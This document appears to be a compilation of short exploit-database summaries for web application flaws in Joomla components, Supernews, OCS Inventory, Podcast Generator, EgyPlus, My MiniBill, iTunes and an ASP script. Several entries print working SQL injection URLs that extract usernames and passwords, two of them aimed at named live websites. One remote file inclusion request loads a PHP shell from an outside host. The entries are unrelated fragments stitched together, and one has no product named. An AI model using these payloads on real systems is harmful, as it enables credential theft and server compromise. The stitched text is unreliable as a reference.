A vulnerability exists in Joomla Component com_mosres (property_uid) which allows an attacker to inject malicious SQL code into the vulnerable parameter. This can be exploited to gain access to the database and potentially gain access to sensitive information. The vulnerability is present when magic_quotes_gpc is set to Off. An example of the vulnerable code is http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code], where [SQL code] is a malicious SQL code. Live demos of the vulnerability can be seen at http://ahtopolbg.com/index.php?option=com_mosres&catID=1004®ID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/* and http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*.
The vulnerable code is located in system/services/init.php, line 84. An attacker can execute arbitrary PHP code by sending a crafted request to the vulnerable script. An example of a malicious request is http://127.0.0.1/path/system/services/init.php?anticode=include 'http://www.darkmindz.com/shell/x2300_mod.txt';
A SQL injection vulnerability exists in Supernews 2.6. An attacker can exploit this vulnerability to gain access to the database by sending maliciously crafted requests to the server. The malicious requests can be sent via the 'news_any_id' parameter in the URL. An example of such a request is: http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--
The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It is possible for unauthenticated users to extract arbitrary files from the hosting system due to inadequate file handling in cvs.php. Attackers may be able to read arbitrary files from the hosting system by using a web browser.
This exploit is related to a Blind SQL Injection vulnerability in Joomla Component Seminar. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'did[]' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's database. This can be exploited to gain access to the application's database and compromise the application and its data.
Podcast Generator contains one flaw that allows an attacker to re-install the cms because of unlink() in 'delete.php' file. It's possible to delete 'config.php' to re-install the cms by setting the 'amilogged' GLOBALS variable to true.
EgyPlus 7ml version 1.0.1 is vulnerable to a Cookie Auth Bypass SQL injection vulnerability (CABSIV). This vulnerability is due to the application not properly sanitizing user-supplied input in the 'username' and 'password' parameters of the 'login.php' script. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. The attacker can also inject arbitrary SQL commands to the application, allowing them to access, modify, or delete data from the back-end database.
My MiniBill is prone to a remote SQL injection vulnerability. An attacker can exploit this issue to manipulate SQL queries and gain access to sensitive information that may aid in further attacks. This issue affects versions prior to My MiniBill 1.0.1.
This modules exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser and in Safari, itms urls will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used.
Remote sql injection Exploit: http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects
Services By CQR